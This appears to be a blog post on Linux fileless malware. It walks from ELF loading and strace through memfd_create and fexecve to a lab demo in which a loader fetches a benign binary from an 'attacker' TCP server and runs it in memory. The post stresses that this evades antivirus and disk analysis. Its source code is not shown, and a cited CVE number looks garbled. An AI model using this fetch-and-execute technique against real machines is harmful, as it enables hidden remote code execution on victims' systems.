File-less malwares: what and how

What are file-less malwares? How do they work on linux?

According to Wikipedia, file-less malware is a variant of computer related malicious software that exists exclusively as a computer memory-based artifact i.e. in RAM.

In other words, the malware/program is never written to harddisk but directly loaded in memory.

How???

To get a better understanding of how that happens in linux, we need to understand how a normal program loads itself into memory and executes itself. If you already know this, feel free to skip next section.

How normal program loads and executes itself?

This is a “HUGE” topic for a mere blog post. So we’ll just scratch the surface and understand about ELF files. ELF Files are main binary format in use on modern Linux systems, and support for it is implemented in the file fs/binfmt_elf.c.

Let’s build our own C program to generate an ELF binary so we can follow and know what we are doing.

Create a C program file with vim not_hello_world.c, and paste the below code into it.

The above code will print out the argc, argv and envp values to the standard output.

Compile it : gcc not_hello_world.c -o not_hello_world.o

Check file type : file not_hello_world.o

Run it : ./not_hello_world.o 12345 123 12345678901234567890 1234

This still does not gives us what is happening behind the scenes, but it tells us that each program has some dedicated memory space where it stores a copy of arguments and environment variables in continuous memory locations. To gather more information we can use the strace utility to trace the system calls made by our program.

Command: strace ./not_hello_world.o myarg1 myarg2 myarg3 2>strace_output.log 1>program_output.log
NOTE:- 2(stderr) redirected to strace_output.log file and 1(stdout) redirected to program_output.log file

command : cat strace_output.log

At first it looks confusing and very difficult to understand, but is very simple and straight forward once you have understood the format of this output.

Now if we look at line-1 of the strace_output.log file, with the newly gained insight. It is very clear that we are calling execve syscall and passing arguments to it.

According to man 2 execve --> execve() executes the program referred to by pathname. This causes the program that is currently being run by the calling process to be replaced with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments.

This concludes that the execve() syscall is actually responsible to load the executable ELF file into memory!! Interestingly, our binary reads (gathers) all the data to be printed from multiple locations and then print it at once at end with a single write() syscall. The return value for write() denotes the number of bytes the syscall wrote. This is the exact amount of chars that was supposed to be written out on stdout but we redirected it to a file. Now we can check if the byte counts are same or not.

We can check if the byte counts in the file match the byte count returned by write() syscall, using → wc -c program_output.log

output:

With this, we know how a normal program executes in Memory. Below diagram summarizes it for a quick recap.

Idea of file-less?

In usual scenarios, we have a compiled malicious binary stored on the victim’s machine, that’s then executed somehow for the malicious purpose of the attacker. Here we have multiple simpler methods and tools to analyze the binary and know what it is going to do. Most of the times, our antivirus can scan system’s harddisk and know if there is a malware or a not.

And we all trust our anti-virus for that!! 😜

But what if an attacker somehow loaded the ELF file directly into the memory, without writing it to harddisk (not even a temp file). In linux, one of the way to do that is via memfd_create() syscall. This creates an "anonymous file" and returns a "file descriptor" to it.

OK! This had me with the first line of the man page — man 2 memfd_create. But there is more to it.

We can now create a file directly in RAM all we need is a way to execute it. We could have used same old execve for this but we don’t have a file pathname to begin with. After looking through the variants of the exec family syscalls, I stumbled upon fexecve() - execute program specified via file descriptor.

Now we have both, a way to create in memory files by memfd_create() and execute it with fexecve(). We just need a program to glue everything together with a neat logic to make things work the way you want it.

First fileless program in C

I’ve written a simple C program (loader.c) that creates an in-memory file and copies the data of a (local) binary to it. And then executes it. Simple, isn't it.

We should give some time to understand this code on why and how it’ll load what in memory.

We can compile this code to generate an ELF file with gcc loader.c -o loader.o; Once compiled, we can run it with ./loader.o

Since there are no arguments(argc<2), it should fail with usage information on stdout.

Let’s try again with some arguments this time.

This time things will not be same as last time. It’ll :-

  1. Creates an in-memory file and gets a file descriptor back (fd1).
  2. Opens local binary file (argv[1] = /usr/bin/file); Stores this file descriptor in fd2.
  3. Read-write loop until everything from fd2 is written in fd1.
  4. Change argv to be passed to in-mem file. The new argv value should look like → /usr/bin/file arg1 arg2 arg3. This means we just have to remove the argv[0] and set everything remaining in proper index values.
  5. Execute fd1 --> in-memory file.

Output:

Last line of the output is the proof that our in-memory file executed successfully… Now we can take it to next level.

loading binary from network

Till this point, we know how to write a basic code to load a local binary, create a in-mem file for it and then execute it.

But an attacker won’t just use it run the local binaries which can be executed directly, instead he would like to execute a binary sitting on his server and load that into victim’s system directly in memory. This will not be detected with the help of any disk analysis tool or commands like ls. Also, this will be executing safe from "Anti-Virus" software complete disk-scan features. In theory, attacker could run anything from his system on victim's system without leaving any trace on harddisk.

To simulate this, I’ve created a pre-setup with a server that hosts a malicious binary and victim’s system where we have the loader.o present.

Without further ado, let’s get things prepared for out test. We need 3 things:

  1. loader binary (on victim’s machine)
  2. malicious binary (on attacker’s machine)
  3. tcp socket server to host malicious binary (on attacker’s machine)

I started out with a (not so) malicious binary, which simply creates a plain-text file when executed.

Source Code: malicious_program.c

Compile it -> gcc malicious_program.c -o malicious_program.o

Next, I wrote a small python tcp socket server that will host the malicious_program.o binary.

Source Code: python_server.py

Finally, we modify the previous local binary loader code to read from connected socket instead of a local binary.

Source code: network_loader.c

Compile it → gcc network_loader.c -o network_loader.o

With this, we have everything ready with us. Some more steps and we are done.

  1. Start the python server on attacker’s machine. — python3 python_server.py
  2. Place the network_loader.o on victim's machine.
  3. Politely ask the victim to execute the binary — ./network_loader.o 192.168.56.56 1234
  4. Sit back and enjoy!

And if we check the victim’s working directory we can see a file with name NOTICE_for_U.txt there.... which confirms that the remote binary successfully ran on victim's machine.

Voila! We just executed a remotely located binary without leaving anytrace on harddisk for further analysis. What we have is a loader binary that reads unknown data from somewhere and just executes it. And there is nothing in the loader binary that could be detected as malicious by most of the automated analysis tools… even VirusTotal does not detect it for what it is.

CVE-2021–4038 describes as a local privilege escalation vulnerability that was found on polkit’s pkexec utility. I’m not sure if it is a false positive or based on similar signatures.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store